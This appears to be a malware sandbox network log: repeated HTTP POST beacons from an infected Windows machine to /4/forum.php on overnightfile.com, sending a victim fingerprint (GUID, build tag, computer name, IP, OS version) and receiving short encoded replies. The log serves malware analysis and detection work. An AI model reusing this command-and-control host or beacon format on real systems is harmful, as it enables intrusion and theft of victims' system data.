                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:53.770147085 CEST873INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKYBPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:54.752809048 CEST873OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:54.842693090 CEST874INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKQJPARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.162519932 CEST874OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:55.256217003 CEST874INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYZABARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.581312895 CEST875OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:55.676470041 CEST875INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 46 55 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cAFUZARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:55.985083103 CEST876OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:56.082051992 CEST876INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFKPUARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:56.372133017 CEST876OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:56.467552900 CEST877INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 47 54 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVGTEARRABw==0
                                                                                                                                      Jul 14, 2020 11:21:57.074621916 CEST877OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:21:57.168193102 CEST877INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:21:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cMCXNARRABw==0
Jul 14, 2020 11:21:57.509881020 CEST | 878 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:57.606030941 CEST | 878 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cTJQGARRABw==0
Jul 14, 2020 11:21:57.901901960 CEST | 878 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:57.990927935 CEST | 879 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cQQJJARRABw==0
Jul 14, 2020 11:21:58.300019026 CEST | 879 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:58.390605927 CEST | 879 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cMKPNARRABw==0
Jul 14, 2020 11:21:58.708343983 CEST | 880 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:58.807141066 CEST | 880 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cGAZTARRABw==0
Jul 14, 2020 11:21:59.119708061 CEST | 881 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:59.218976021 CEST | 881 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cQBYJARRABw==0
Jul 14, 2020 11:21:59.530056000 CEST | 881 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:21:59.628071070 CEST | 882 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cZFUAARRABw==0
Jul 14, 2020 11:21:59.978267908 CEST | 882 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:00.080739021 CEST | 882 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:21:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cNHSMARRABw==0
Jul 14, 2020 11:22:00.397629976 CEST | 883 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:00.492716074 CEST | 883 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cBFUYARRABw==0
Jul 14, 2020 11:22:00.794836998 CEST | 884 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:00.890624046 CEST | 884 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cVQJEARRABw==0
Jul 14, 2020 11:22:01.258352995 CEST | 884 | OUT | POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: overnightfile.com
Content-Length: 111
Cache-Control: no-cache
Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
Jul 14, 2020 11:22:01.353295088 CEST | 885 | IN | HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 14 Jul 2020 09:22:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Ascii: cMFUNARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:01.668510914 CEST885OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:01.756225109 CEST885INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cNBYMARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.080809116 CEST886OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:02.171083927 CEST886INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:01 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBZAYARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.499869108 CEST886OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:02.590312004 CEST887INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGQJTARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:02.976793051 CEST887OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:03.065212011 CEST887INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZZAAARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:03.540097952 CEST888OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:03.632066965 CEST889INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVCXEARRABw==0
                                                                                                                                      Jul 14, 2020 11:22:03.952004910 CEST889OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:22:04.040241957 CEST890INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:22:03 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVBYEARRABw==0
